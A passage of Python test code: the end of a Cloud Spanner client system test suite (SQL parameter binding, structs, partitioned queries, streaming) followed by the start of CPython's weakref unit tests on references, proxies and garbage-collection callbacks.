"ORDER BY C1 ASC)"
)
self._db.snapshot(multi_use=True)
self._check_sql_results(
self._db, sql=sql, params=None, param_types=None, expected=[[[]]]
)
def test_invalid_type(self):
table = "counters"
columns = ("name", "value")
valid_input = (("", 0),)
with self._db.batch() as batch:
batch.delete(table, self.ALL)
batch.insert(table, columns, valid_input)
invalid_input = ((0, ""),)
with self.assertRaises(exceptions.FailedPrecondition):
with self._db.batch() as batch:
batch.delete(table, self.ALL)
batch.insert(table, columns, invalid_input)
def test_execute_sql_select_1(self):
self._db.snapshot(multi_use=True)
# Hello, world query
self._check_sql_results(
self._db,
sql="SELECT 1",
params=None,
param_types=None,
expected=[(1,)],
order=False,
)
def _bind_test_helper(
self, type_name, single_value, array_value, expected_array_value=None
):
self._db.snapshot(multi_use=True)
# Bind a non-null <type_name>
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": single_value},
param_types={"v": Type(code=type_name)},
expected=[(single_value,)],
order=False,
)
# Bind a null <type_name>
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": None},
param_types={"v": Type(code=type_name)},
expected=[(None,)],
order=False,
)
# Bind an array of <type_name>
array_type = Type(code=TypeCode.ARRAY, array_element_type=Type(code=type_name))
if expected_array_value is None:
expected_array_value = array_value
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": array_value},
param_types={"v": array_type},
expected=[(expected_array_value,)],
order=False,
)
# Bind an empty array of <type_name>
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": []},
param_types={"v": array_type},
expected=[([],)],
order=False,
)
# Bind a null array of <type_name>
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": None},
param_types={"v": array_type},
expected=[(None,)],
order=False,
)
def test_execute_sql_w_string_bindings(self):
self._bind_test_helper(TypeCode.STRING, "Phred", ["Phred", "Bharney"])
def test_execute_sql_w_bool_bindings(self):
self._bind_test_helper(TypeCode.BOOL, True, [True, False, True])
def test_execute_sql_w_int64_bindings(self):
self._bind_test_helper(TypeCode.INT64, 42, [123, 456, 789])
def test_execute_sql_w_float64_bindings(self):
self._bind_test_helper(TypeCode.FLOAT64, 42.3, [12.3, 456.0, 7.89])
def test_execute_sql_w_float_bindings_transfinite(self):
# Find -inf
self._check_sql_results(
self._db,
sql="SELECT @neg_inf",
params={"neg_inf": NEG_INF},
param_types={"neg_inf": param_types.FLOAT64},
expected=[(NEG_INF,)],
order=False,
)
# Find +inf
self._check_sql_results(
self._db,
sql="SELECT @pos_inf",
params={"pos_inf": POS_INF},
param_types={"pos_inf": param_types.FLOAT64},
expected=[(POS_INF,)],
order=False,
)
def test_execute_sql_w_bytes_bindings(self):
self._bind_test_helper(TypeCode.BYTES, b"DEADBEEF", [b"FACEDACE", b"DEADBEEF"])
def test_execute_sql_w_timestamp_bindings(self):
import pytz
from google.api_core.datetime_helpers import DatetimeWithNanoseconds
timestamp_1 = DatetimeWithNanoseconds(
1989, 1, 17, 17, 59, 12, nanosecond=345612789
)
timestamp_2 = DatetimeWithNanoseconds(
1989, 1, 17, 17, 59, 13, nanosecond=456127893
)
timestamps = [timestamp_1, timestamp_2]
# In round-trip, timestamps acquire a timezone value.
expected_timestamps = [
timestamp.replace(tzinfo=pytz.UTC) for timestamp in timestamps
]
self._recurse_into_lists = False
self._bind_test_helper(
TypeCode.TIMESTAMP, timestamp_1, timestamps, expected_timestamps
)
def test_execute_sql_w_date_bindings(self):
import datetime
dates = [SOME_DATE, SOME_DATE + datetime.timedelta(days=1)]
self._bind_test_helper(TypeCode.DATE, SOME_DATE, dates)
@unittest.skipIf(USE_EMULATOR, "Skipping NUMERIC")
def test_execute_sql_w_numeric_bindings(self):
self._bind_test_helper(TypeCode.NUMERIC, NUMERIC_1, [NUMERIC_1, NUMERIC_2])
def test_execute_sql_w_query_param_struct(self):
name = "Phred"
count = 123
size = 23.456
height = 188.0
weight = 97.6
record_type = param_types.Struct(
[
param_types.StructField("name", param_types.STRING),
param_types.StructField("count", param_types.INT64),
param_types.StructField("size", param_types.FLOAT64),
param_types.StructField(
"nested",
param_types.Struct(
[
param_types.StructField("height", param_types.FLOAT64),
param_types.StructField("weight", param_types.FLOAT64),
]
),
),
]
)
# Query with null struct, explicit type
self._check_sql_results(
self._db,
sql="SELECT @r.name, @r.count, @r.size, @r.nested.weight",
params={"r": None},
param_types={"r": record_type},
expected=[(None, None, None, None)],
order=False,
)
# Query with non-null struct, explicit type, NULL values
self._check_sql_results(
self._db,
sql="SELECT @r.name, @r.count, @r.size, @r.nested.weight",
params={"r": (None, None, None, None)},
param_types={"r": record_type},
expected=[(None, None, None, None)],
order=False,
)
# Query with non-null struct, explicit type, nested NULL values
self._check_sql_results(
self._db,
sql="SELECT @r.nested.weight",
params={"r": (None, None, None, (None, None))},
param_types={"r": record_type},
expected=[(None,)],
order=False,
)
# Query with non-null struct, explicit type
self._check_sql_results(
self._db,
sql="SELECT @r.name, @r.count, @r.size, @r.nested.weight",
params={"r": (name, count, size, (height, weight))},
param_types={"r": record_type},
expected=[(name, count, size, weight)],
order=False,
)
# Query with empty struct, explicitly empty type
empty_type = param_types.Struct([])
self._check_sql_results(
self._db,
sql="SELECT @r IS NULL",
params={"r": ()},
param_types={"r": empty_type},
expected=[(False,)],
order=False,
)
# Query with null struct, explicitly empty type
self._check_sql_results(
self._db,
sql="SELECT @r IS NULL",
params={"r": None},
param_types={"r": empty_type},
expected=[(True,)],
order=False,
)
# Query with equality check for struct value
struct_equality_query = (
"SELECT " '@struct_param=STRUCT<threadf INT64, userf STRING>(1,"bob")'
)
struct_type = param_types.Struct(
[
param_types.StructField("threadf", param_types.INT64),
param_types.StructField("userf", param_types.STRING),
]
)
self._check_sql_results(
self._db,
sql=struct_equality_query,
params={"struct_param": (1, "bob")},
param_types={"struct_param": struct_type},
expected=[(True,)],
order=False,
)
# Query with nullness test for struct
self._check_sql_results(
self._db,
sql="SELECT @struct_param IS NULL",
params={"struct_param": None},
param_types={"struct_param": struct_type},
expected=[(True,)],
order=False,
)
# Query with null array-of-struct
array_elem_type = param_types.Struct(
[param_types.StructField("threadid", param_types.INT64)]
)
array_type = param_types.Array(array_elem_type)
self._check_sql_results(
self._db,
sql="SELECT a.threadid FROM UNNEST(@struct_arr_param) a",
params={"struct_arr_param": None},
param_types={"struct_arr_param": array_type},
expected=[],
order=False,
)
# Query with non-null array-of-struct
self._check_sql_results(
self._db,
sql="SELECT a.threadid FROM UNNEST(@struct_arr_param) a",
params={"struct_arr_param": [(123,), (456,)]},
param_types={"struct_arr_param": array_type},
expected=[(123,), (456,)],
order=False,
)
# Query with null array-of-struct field
struct_type_with_array_field = param_types.Struct(
[
param_types.StructField("intf", param_types.INT64),
param_types.StructField("arraysf", array_type),
]
)
self._check_sql_results(
self._db,
sql="SELECT a.threadid FROM UNNEST(@struct_param.arraysf) a",
params={"struct_param": (123, None)},
param_types={"struct_param": struct_type_with_array_field},
expected=[],
order=False,
)
# Query with non-null array-of-struct field
self._check_sql_results(
self._db,
sql="SELECT a.threadid FROM UNNEST(@struct_param.arraysf) a",
params={"struct_param": (123, ((456,), (789,)))},
param_types={"struct_param": struct_type_with_array_field},
expected=[(456,), (789,)],
order=False,
)
# Query with anonymous / repeated-name fields
anon_repeated_array_elem_type = param_types.Struct(
[
param_types.StructField("", param_types.INT64),
param_types.StructField("", param_types.STRING),
]
)
anon_repeated_array_type = param_types.Array(anon_repeated_array_elem_type)
self._check_sql_results(
self._db,
sql="SELECT CAST(t as STRUCT<threadid INT64, userid STRING>).* "
"FROM UNNEST(@struct_param) t",
params={"struct_param": [(123, "abcdef")]},
param_types={"struct_param": anon_repeated_array_type},
expected=[(123, "abcdef")],
order=False,
)
# Query and return a struct parameter
value_type = param_types.Struct(
[
param_types.StructField("message", param_types.STRING),
param_types.StructField("repeat", param_types.INT64),
]
)
value_query = (
"SELECT ARRAY(SELECT AS STRUCT message, repeat "
"FROM (SELECT @value.message AS message, "
"@value.repeat AS repeat)) AS value"
)
self._check_sql_results(
self._db,
sql=value_query,
params={"value": ("hello", 1)},
param_types={"value": value_type},
expected=[([["hello", 1]],)],
order=False,
)
def test_execute_sql_returning_transfinite_floats(self):
with self._db.snapshot(multi_use=True) as snapshot:
# Query returning -inf, +inf, NaN as column values
rows = list(
snapshot.execute_sql(
"SELECT "
'CAST("-inf" AS FLOAT64), '
'CAST("+inf" AS FLOAT64), '
'CAST("NaN" AS FLOAT64)'
)
)
self.assertEqual(len(rows), 1)
self.assertEqual(rows[0][0], float("-inf"))
self.assertEqual(rows[0][1], float("+inf"))
# NaNs cannot be compared by equality.
self.assertTrue(math.isnan(rows[0][2]))
# Query returning array of -inf, +inf, NaN as one column
rows = list(
snapshot.execute_sql(
"SELECT"
' [CAST("-inf" AS FLOAT64),'
' CAST("+inf" AS FLOAT64),'
' CAST("NaN" AS FLOAT64)]'
)
)
self.assertEqual(len(rows), 1)
float_array = rows[0][0]
self.assertEqual(float_array[0], float("-inf"))
self.assertEqual(float_array[1], float("+inf"))
# NaNs cannot be searched for by equality.
self.assertTrue(math.isnan(float_array[2]))
def test_partition_query(self):
row_count = 40
sql = "SELECT * FROM {}".format(self.TABLE)
committed = self._set_up_table(row_count)
# Paritioned query does not support ORDER BY
all_data_rows = set(self._row_data(row_count))
union = set()
batch_txn = self._db.batch_snapshot(read_timestamp=committed)
for batch in batch_txn.generate_query_batches(sql):
p_results_iter = batch_txn.process(batch)
# Lists aren't hashable so the results need to be converted
rows = [tuple(result) for result in p_results_iter]
union.update(set(rows))
self.assertEqual(union, all_data_rows)
batch_txn.close()
class TestStreamingChunking(unittest.TestCase, _TestData):
@classmethod
def setUpClass(cls):
from tests.system.utils.streaming_utils import INSTANCE_NAME
from tests.system.utils.streaming_utils import DATABASE_NAME
instance = Config.CLIENT.instance(INSTANCE_NAME)
if not instance.exists():
raise unittest.SkipTest(
"Run 'tests/system/utils/populate_streaming.py' to enable."
)
database = instance.database(DATABASE_NAME)
if not instance.exists():
raise unittest.SkipTest(
"Run 'tests/system/utils/populate_streaming.py' to enable."
)
cls._db = database
def _verify_one_column(self, table_desc):
sql = "SELECT chunk_me FROM {}".format(table_desc.table)
with self._db.snapshot() as snapshot:
rows = list(snapshot.execute_sql(sql))
self.assertEqual(len(rows), table_desc.row_count)
expected = table_desc.value()
for row in rows:
self.assertEqual(row[0], expected)
def _verify_two_columns(self, table_desc):
sql = "SELECT chunk_me, chunk_me_2 FROM {}".format(table_desc.table)
with self._db.snapshot() as snapshot:
rows = list(snapshot.execute_sql(sql))
self.assertEqual(len(rows), table_desc.row_count)
expected = table_desc.value()
for row in rows:
self.assertEqual(row[0], expected)
self.assertEqual(row[1], expected)
def test_four_kay(self):
from tests.system.utils.streaming_utils import FOUR_KAY
self._verify_one_column(FOUR_KAY)
def test_forty_kay(self):
from tests.system.utils.streaming_utils import FORTY_KAY
self._verify_one_column(FORTY_KAY)
def test_four_hundred_kay(self):
from tests.system.utils.streaming_utils import FOUR_HUNDRED_KAY
self._verify_one_column(FOUR_HUNDRED_KAY)
def test_four_meg(self):
from tests.system.utils.streaming_utils import FOUR_MEG
self._verify_two_columns(FOUR_MEG)
class CustomException(Exception):
"""Placeholder for any user-defined exception."""
class _DatabaseDropper(object):
"""Helper for cleaning up databases created on-the-fly."""
def __init__(self, db):
self._db = db
def delete(self):
self._db.drop()
class _ReadAbortTrigger(object):
"""Helper for tests provoking abort-during-read."""
KEY1 = "key1"
KEY2 = "key2"
def __init__(self):
self.provoker_started = threading.Event()
self.provoker_done = threading.Event()
self.handler_running = threading.Event()
self.handler_done = threading.Event()
def _provoke_abort_unit_of_work(self, transaction):
keyset = KeySet(keys=[(self.KEY1,)])
rows = list(transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset))
assert len(rows) == 1
row = rows[0]
value = row[1]
self.provoker_started.set()
self.handler_running.wait()
transaction.update(COUNTERS_TABLE, COUNTERS_COLUMNS, [[self.KEY1, value + 1]])
def provoke_abort(self, database):
database.run_in_transaction(self._provoke_abort_unit_of_work)
self.provoker_done.set()
def _handle_abort_unit_of_work(self, transaction):
keyset_1 = KeySet(keys=[(self.KEY1,)])
rows_1 = list(transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset_1))
assert len(rows_1) == 1
row_1 = rows_1[0]
value_1 = row_1[1]
self.handler_running.set()
self.provoker_done.wait()
keyset_2 = KeySet(keys=[(self.KEY2,)])
rows_2 = list(transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset_2))
assert len(rows_2) == 1
row_2 = rows_2[0]
value_2 = row_2[1]
transaction.update(
COUNTERS_TABLE, COUNTERS_COLUMNS, [[self.KEY2, value_1 + value_2]]
)
def handle_abort(self, database):
database.run_in_transaction(self._handle_abort_unit_of_work)
self.handler_done.set()
class FauxCall(object):
def __init__(self, code, details="FauxCall"):
self._code = code
self._details = details
def initial_metadata(self):
return {}
def trailing_metadata(self):
return {}
def code(self):
return self._code
def details(self):
return self._details
|
test_weakref.py
|
import gc
import sys
import unittest
import collections
import weakref
import operator
import contextlib
import copy
import threading
import time
import random
from test import support
from test.support import script_helper, ALWAYS_EQ
# Used in ReferencesTestCase.test_ref_created_during_del() .
ref_from_del = None
# Used by FinalizeTestCase as a global that may be replaced by None
# when the interpreter shuts down.
_global_var = 'foobar'
class C:
def method(self):
pass
class Callable:
bar = None
def __call__(self, x):
self.bar = x
def create_function():
def f(): pass
return f
def create_bound_method():
return C().method
class Object:
def __init__(self, arg):
self.arg = arg
def __repr__(self):
return "<Object %r>" % self.arg
def __eq__(self, other):
if isinstance(other, Object):
return self.arg == other.arg
return NotImplemented
def __lt__(self, other):
if isinstance(other, Object):
return self.arg < other.arg
return NotImplemented
def __hash__(self):
return hash(self.arg)
def some_method(self):
return 4
def other_method(self):
return 5
class RefCycle:
def __init__(self):
self.cycle = self
class TestBase(unittest.TestCase):
def setUp(self):
self.cbcalled = 0
def callback(self, ref):
self.cbcalled += 1
@contextlib.contextmanager
def collect_in_thread(period=0.0001):
"""
Ensure GC collections happen in a different thread, at a high frequency.
"""
please_stop = False
def collect():
while not please_stop:
time.sleep(period)
gc.collect()
with support.disable_gc():
t = threading.Thread(target=collect)
t.start()
try:
yield
finally:
please_stop = True
t.join()
class ReferencesTestCase(TestBase):
def test_basic_ref(self):
self.check_basic_ref(C)
self.check_basic_ref(create_function)
self.check_basic_ref(create_bound_method)
# Just make sure the tp_repr handler doesn't raise an exception.
# Live reference:
o = C()
wr = weakref.ref(o)
repr(wr)
# Dead reference:
del o
repr(wr)
def test_basic_callback(self):
self.check_basic_callback(C)
self.check_basic_callback(create_function)
self.check_basic_callback(create_bound_method)
@support.cpython_only
def test_cfunction(self):
import _testcapi
create_cfunction = _testcapi.create_cfunction
f = create_cfunction()
wr = weakref.ref(f)
self.assertIs(wr(), f)
del f
self.assertIsNone(wr())
self.check_basic_ref(create_cfunction)
self.check_basic_callback(create_cfunction)
def test_multiple_callbacks(self):
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del o
self.assertIsNone(ref1(), "expected reference to be invalidated")
self.assertIsNone(ref2(), "expected reference to be invalidated")
self.assertEqual(self.cbcalled, 2,
"callback not called the right number of times")
def test_multiple_selfref_callbacks(self):
# Make sure all references are invalidated before callbacks are called
#
# What's important here is that we're using the first
# reference in the callback invoked on the second reference
# (the most recently created ref is cleaned up first). This
# tests that all references to the object are invalidated
# before any of the callbacks are invoked, so that we only
# have one invocation of _weakref.c:cleanup_helper() active
# for a particular object at a time.
#
def callback(object, self=self):
self.ref()
c = C()
self.ref = weakref.ref(c, callback)
ref1 = weakref.ref(c, callback)
del c
def test_constructor_kwargs(self):
c = C()
self.assertRaises(TypeError, weakref.ref, c, callback=None)
def test_proxy_ref(self):
o = C()
o.bar = 1
ref1 = weakref.proxy(o, self.callback)
ref2 = weakref.proxy(o, self.callback)
del o
def check(proxy):
proxy.bar
self.assertRaises(ReferenceError, check, ref1)
self.assertRaises(ReferenceError, check, ref2)
self.assertRaises(ReferenceError, bool, weakref.proxy(C()))
self.assertEqual(self.cbcalled, 2)
def check_basic_ref(self, factory):
o = factory()
ref = weakref.ref(o)
self.assertIsNotNone(ref(),
"weak reference to live object should be live")
o2 = ref()
self.assertIs(o, o2,
"<ref>() should return original object if live")
def check_basic_callback(self, factory):
self.cbcalled = 0
o = factory()
ref = weakref.ref(o, self.callback)
del o
self.assertEqual(self.cbcalled, 1,
"callback did not properly set 'cbcalled'")
self.assertIsNone(ref(),
"ref2 should be dead after deleting object reference")
def test_ref_reuse(self):
o = C()
ref1 = weakref.ref(o)
# create a proxy to make sure that there's an intervening creation
# between these two; it should make no difference
proxy = weakref.proxy(o)
ref2 = weakref.ref(o)
self.assertIs(ref1, ref2,
"reference object w/out callback should be re-used")
o = C()
proxy = weakref.proxy(o)
ref1 = weakref.ref(o)
ref2 = weakref.ref(o)
self.assertIs(ref1, ref2,
"reference object w/out callback should be re-used")
self.assertEqual(weakref.getweakrefcount(o), 2,
"wrong weak ref count for object")
del proxy
self.assertEqual(weakref.getweakrefcount(o), 1,
"wrong weak ref count for object after deleting proxy")
def test_proxy_reuse(self):
o = C()
proxy1 = weakref.proxy(o)
ref = weakref.ref(o)
proxy2 = weakref.proxy(o)
self.assertIs(proxy1, proxy2,
"proxy object w/out callback should have been re-used")
def test_basic_proxy(self):
o = C()
self.check_proxy(o, weakref.proxy(o))
L = collections.UserList()
p = weakref.proxy(L)
self.assertFalse(p, "proxy for empty UserList should be false")
p.append(12)
self.assertEqual(len(L), 1)
self.assertTrue(p, "proxy for non-empty UserList should be true")
p[:] = [2, 3]
self.assertEqual(len(L), 2)
self.assertEqual(len(p), 2)
self.assertIn(3, p, "proxy didn't support __contains__() properly")
p[1] = 5
self.assertEqual(L[1], 5)
self.assertEqual(p[1], 5)
L2 = collections.UserList(L)
p2 = weakref.proxy(L2)
self.assertEqual(p, p2)
## self.assertEqual(repr(L2), repr(p2))
L3 = collections.UserList(range(10))
p3 = weakref.proxy(L3)
self.assertEqual(L3[:], p3[:])
self.assertEqual(L3[5:], p3[5:])
self.assertEqual(L3[:5], p3[:5])
self.assertEqual(L3[2:5], p3[2:5])
def test_proxy_unicode(self):
# See bug 5037
class C(object):
def __str__(self):
return "string"
def __bytes__(self):
return b"bytes"
instance = C()
self.assertIn("__bytes__", dir(weakref.proxy(instance)))
self.assertEqual(bytes(weakref.proxy(instance)), b"bytes")
def test_proxy_index(self):
class C:
def __index__(self):
return 10
o = C()
p = weakref.proxy(o)
self.assertEqual(operator.index(p), 10)
def test_proxy_div(self):
class C:
def __floordiv__(self, other):
return 42
def __ifloordiv__(self, other):
return 21
o = C()
p = weakref.proxy(o)
self.assertEqual(p // 5, 42)
p //= 5
self.assertEqual(p, 21)
def test_proxy_matmul(self):
class C:
def __matmul__(self, other):
return 1729
def __rmatmul__(self, other):
return -163
def __imatmul__(self, other):
return 561
o = C()
p = weakref.proxy(o)
self.assertEqual(p @ 5, 1729)
self.assertEqual(5 @ p, -163)
p @= 5
self.assertEqual(p, 561)
# The PyWeakref_* C API is documented as allowing either NULL or
# None as the value for the callback, where either means "no
# callback". The "no callback" ref and proxy objects are supposed
# to be shared so long as they exist by all callers so long as
# they are active. In Python 2.3.3 and earlier, this guarantee
# was not honored, and was broken in different ways for
# PyWeakref_NewRef() and PyWeakref_NewProxy(). (Two tests.)
def test_shared_ref_without_callback(self):
self.check_shared_without_callback(weakref.ref)
def test_shared_proxy_without_callback(self):
self.check_shared_without_callback(weakref.proxy)
def check_shared_without_callback(self, makeref):
o = Object(1)
p1 = makeref(o, None)
p2 = makeref(o, None)
self.assertIs(p1, p2, "both callbacks were None in the C API")
del p1, p2
p1 = makeref(o)
p2 = makeref(o, None)
self.assertIs(p1, p2, "callbacks were NULL, None in the C API")
del p1, p2
p1 = makeref(o)
p2 = makeref(o)
self.assertIs(p1, p2, "both callbacks were NULL in the C API")
del p1, p2
p1 = makeref(o, None)
p2 = makeref(o)
self.assertIs(p1, p2, "callbacks were None, NULL in the C API")
def test_callable_proxy(self):
o = Callable()
ref1 = weakref.proxy(o)
self.check_proxy(o, ref1)
self.assertIs(type(ref1), weakref.CallableProxyType,
"proxy is not of callable type")
ref1('twinkies!')
self.assertEqual(o.bar, 'twinkies!',
"call through proxy not passed through to original")
ref1(x='Splat.')
self.assertEqual(o.bar, 'Splat.',
"call through proxy not passed through to original")
# expect due to too few args
self.assertRaises(TypeError, ref1)
# expect due to too many args
self.assertRaises(TypeError, ref1, 1, 2, 3)
def check_proxy(self, o, proxy):
o.foo = 1
self.assertEqual(proxy.foo, 1,
"proxy does not reflect attribute addition")
o.foo = 2
self.assertEqual(proxy.foo, 2,
"proxy does not reflect attribute modification")
del o.foo
self.assertFalse(hasattr(proxy, 'foo'),
"proxy does not reflect attribute removal")
proxy.foo = 1
self.assertEqual(o.foo, 1,
"object does not reflect attribute addition via proxy")
proxy.foo = 2
self.assertEqual(o.foo, 2,
"object does not reflect attribute modification via proxy")
del proxy.foo
self.assertFalse(hasattr(o, 'foo'),
"object does not reflect attribute removal via proxy")
def test_proxy_deletion(self):
# Test clearing of SF bug #762891
class Foo:
result = None
def __delitem__(self, accessor):
self.result = accessor
g = Foo()
f = weakref.proxy(g)
del f[0]
self.assertEqual(f.result, 0)
def test_proxy_bool(self):
# Test clearing of SF bug #1170766
class List(list): pass
lyst = List()
self.assertEqual(bool(weakref.proxy(lyst)), bool(lyst))
def test_getweakrefcount(self):
o = C()
ref1 = weakref.ref(o)
ref2 = weakref.ref(o, self.callback)
self.assertEqual(weakref.getweakrefcount(o), 2,
"got wrong number of weak reference objects")
proxy1 = weakref.proxy(o)
proxy2 = weakref.proxy(o, self.callback)
self.assertEqual(weakref.getweakrefcount(o), 4,
"got wrong number of weak reference objects")
del ref1, ref2, proxy1, proxy2
self.assertEqual(weakref.getweakrefcount(o), 0,
"weak reference objects not unlinked from"
" referent when discarded.")
# assumes ints do not support weakrefs
self.assertEqual(weakref.getweakrefcount(1), 0,
"got wrong number of weak reference objects for int")
def test_getweakrefs(self):
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del ref1
self.assertEqual(weakref.getweakrefs(o), [ref2],
"list of refs does not match")
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del ref2
self.assertEqual(weakref.getweakrefs(o), [ref1],
"list of refs does not match")
del ref1
self.assertEqual(weakref.getweakrefs(o), [],
"list of refs not cleared")
# assumes ints do not support weakrefs
self.assertEqual(weakref.getweakrefs(1), [],
"list of refs does not match for int")
def test_newstyle_number_ops(self):
class F(float):
pass
f = F(2.0)
p = weakref.proxy(f)
self.assertEqual(p + 1.0, 3.0)
self.assertEqual(1.0 + p, 3.0) # this used to SEGV
def test_callbacks_protected(self):
# Callbacks protected from already-set exceptions?
# Regression test for SF bug #478534.
class BogusError(Exception):
pass
data = {}
def remove(k):
del data[k]
def encapsulate():
f = lambda : ()
data[weakref.ref(f, remove)] = None
raise BogusError
try:
encapsulate()
except BogusError:
pass
else:
self.fail("exception not properly restored")
try:
encapsulate()
except BogusError:
pass
else:
self.fail("exception not properly restored")
def test_sf_bug_840829(self):
# "weakref callbacks and gc corrupt memory"
# subtype_dealloc erroneously exposed a new-style instance
# already in the process of getting deallocated to gc,
# causing double-deallocation if the instance had a weakref
# callback that triggered gc.
# If the bug exists, there probably won't be an obvious symptom
# in a release build. In a debug build, a segfault will occur
# when the second attempt to remove the instance from the "list
# of all objects" occurs.
import gc
class C(object):
pass
c = C()
wr = weakref.ref(c, lambda ignore: gc.collect())
del c
# There endeth the first part. It gets worse.
del wr
c1 = C()
c1.i = C()
wr = weakref.ref(c1.i, lambda ignore: gc.collect())
c2 = C()
c2.c1 = c1
del c1 # still alive because c2 points to it
# Now when subtype_dealloc gets called on c2, it's not enough just
# that c2 is immune from gc while the weakref callbacks associated
# with c2 execute (there are none in this 2nd half of the test, btw).
# subtype_dealloc goes on to call the base classes' deallocs too,
# so any gc triggered by weakref callbacks associated with anything
# torn down by a base class dealloc can also trigger double
# deallocation of c2.
del c2
def test_callback_in_cycle_1(self):
import gc
class J(object):
pass
class II(object):
def acallback(self, ignore):
self.J
I = II()
I.J = J
I.wr = weakref.ref(J, I.acallback)
# Now J and II are each in a self-cycle (as all new-style class
# objects are, since their __mro__ points back to them). I holds
# both a weak reference (I.wr) and a strong reference (I.J) to class
# J. I is also in a cycle (I.wr points to a weakref that references
# I.acallback). When we del these three, they all become trash, but
# the cycles prevent any of them from getting cleaned up immediately.
# Instead they have to wait for cyclic gc to deduce that they're
# trash.
#
# gc used to call tp_clear on all of them, and the order in which
# it does that is pretty accidental. The exact order in which we
# built up these things manages to provoke gc into running tp_clear
# in just the right order (I last). Calling tp_clear on II leaves
# behind an insane class object (its __mro__ becomes NULL). Calling
# tp_clear on J breaks its self-cycle, but J doesn't get deleted
# just then because of the strong reference from I.J. Calling
# tp_clear on I starts to clear I's __dict__, and just happens to
# clear I.J first -- I.wr is still intact. That removes the last
# reference to J, which triggers the weakref callback. The callback
# tries to do "self.J", and instances of new-style classes look up
# attributes ("J") in the class dict first. The class (II) wants to
# search II.__mro__, but that's NULL. The result was a segfault in
# a release build, and an assert failure in a debug build.
del I, J, II
gc.collect()
def test_callback_in_cycle_2(self):
import gc
# This is just like test_callback_in_cycle_1, except that II is an
# old-style class. The symptom is different then: an instance of an
# old-style class looks in its own __dict__ first. 'J' happens to
# get cleared from I.__dict__ before 'wr', and 'J' was never in II's
# __dict__, so the attribute isn't found. The difference is that
# the old-style II doesn't have a NULL __mro__ (it doesn't have any
# __mro__), so no segfault occurs. Instead it got:
# test_callback_in_cycle_2 (__main__.ReferencesTestCase) ...
# Exception exceptions.AttributeError:
# "II instance has no attribute 'J'" in <bound method II.acallback
# of <?.II instance at 0x00B9B4B8>> ignored
class J(object):
pass
class II:
def acallback(self, ignore):
self.J
I = II()
I.J = J
I.wr = weakref.ref(J, I.acallback)
del I, J, II
gc.collect()
def test_callback_in_cycle_3(self):
import gc
# This one broke the first patch that fixed the last two. In this
# case, the objects reachable from the callback aren't also reachable
# from the object (c1) *triggering* the callback: you can get to
# c1 from c2, but not vice-versa. The result was that c2's __dict__
# got tp_clear'ed by the time the c2.cb callback got invoked.
class C:
def cb(self, ignore):
self.me
self.c1
self.wr
c1, c2 = C(), C()
c2.me = c2
c2.c1 = c1
c2.wr = weakref.ref(c1, c2.cb)
del c1, c2
gc.collect()
def test_callback_in_cycle_4(self):
import gc
# Like test_callback_in_cycle_3, except c2 and c1 have different
# classes. c2's class (C) isn't reachable from c1 then, so protecting
# objects reachable from the dying object (c1) isn't enough to stop
# c2's class (C) from getting tp_clear'ed before c2.cb is invoked.
# The result was a segfault (C.__mro__ was NULL when the callback
# tried to look up self.me).
class C(object):
def cb(self, ignore):
self.me
self.c1
self.wr
class D:
pass
c1, c2 = D(), C()
c2.me = c2
c2.c1 = c1
c2.wr = weakref.ref(c1, c2.cb)
del c1, c2, C, D
gc.collect()
@support.requires_type_collecting
def test_callback_in_cycle_resurrection(self):
import gc
# Do something nasty in a weakref callback: resurrect objects
# from dead cycles. For this to be attempted, the weakref and
# its callback must also be part of the cyclic trash (else the
# objects reachable via the callback couldn't be in cyclic trash
# to begin with -- the callback would act like an external root).
# But gc clears trash weakrefs with callbacks early now, which
# disables the callbacks, so the callbacks shouldn't get called
# at all (and so nothing actually gets resurrected).
alist = []
class C(object):
def __init__(self, value):
self.attribute = value
def acallback(self, ignore):
alist.append(self.c)
c1, c2 = C(1), C(2)
c1.c = c2
c2.c = c1
c1.wr = weakref.ref(c2, c1.acallback)
c2.wr = weakref.ref(c1, c2.acallback)
def C_went_away(ignore):
alist.append("C went away")
wr = weakref.ref(C, C_went_away)
del c1, c2, C # make them all trash
self.assertEqual(alist, []) # del isn't enough to reclaim anything
gc.collect()
# c1.wr and c2.wr were part of the cyclic trash, so should have
# been cleared without their callbacks executing. OTOH, the weakref
# to C is bound to a function local (wr), and wasn't trash, so that
# callback should have been invoked when C went away.
self.assertEqual(alist, ["C went away"])
# The remaining weakref should be dead now (its callback ran).
self.assertEqual(wr(), None)
del alist[:]
gc.collect()
self.assertEqual(alist, [])
def test_callbacks_on_callback(self):
import gc
# Set up weakref callbacks *on* weakref callbacks.
alist = []
def safe_callback(ignore):
alist.append("safe_callback called")
class C(object):
def cb(self, ignore):
alist.append("cb called")
c, d = C(), C()
c.other = d
d.other = c
callback = c.cb
c.wr = weakref.ref(d, callback) # this won't trigger
d.wr = weakref.ref(callback, d.cb) # ditto
external_wr = weakref.ref(callback, safe_callback) # but this will
self.assertIs(external_wr(), callback)
# The weakrefs attached to c and d should get cleared, so that
# C.cb is never called. But external_wr isn't part of the cyclic
# trash, and no cyclic trash is reachable from it, so safe_callback
# should get invoked when the bound method object callback (c.cb)
# -- which is itself a callback, and also part of the cyclic trash --
# gets reclaimed at the end of gc.
del callback, c, d, C
self.assertEqual(alist, []) # del isn't enough to clean up cycles
gc.collect()
self.assertEqual(alist, ["safe_callback called"])
self.assertEqual(external_wr(), None)
del alist[:]
gc.collect()
self.assertEqual(alist, [])
def test_gc_during_ref_creation(self):
self.check_gc_during_creation(weakref.ref)
def test_gc_during_proxy_creation(self):
self.check_gc_during_creation(weakref.proxy)
def check_gc_during_creation(self, makeref):
thresholds = gc.get_threshold()
gc.set_threshold(1, 1, 1)
gc.collect()
class A:
pass
def callback(*args):
pass
referenced = A()
a = A()
a.a = a
a.wr = makeref(referenced)
try:
# now make sure the object and the ref get labeled as
# cyclic trash:
a = A()
weakref.ref(referenced, callback)
finally:
gc.set_threshold(*thresholds)
def test_ref_created_during_del(self):
# Bug #1377858
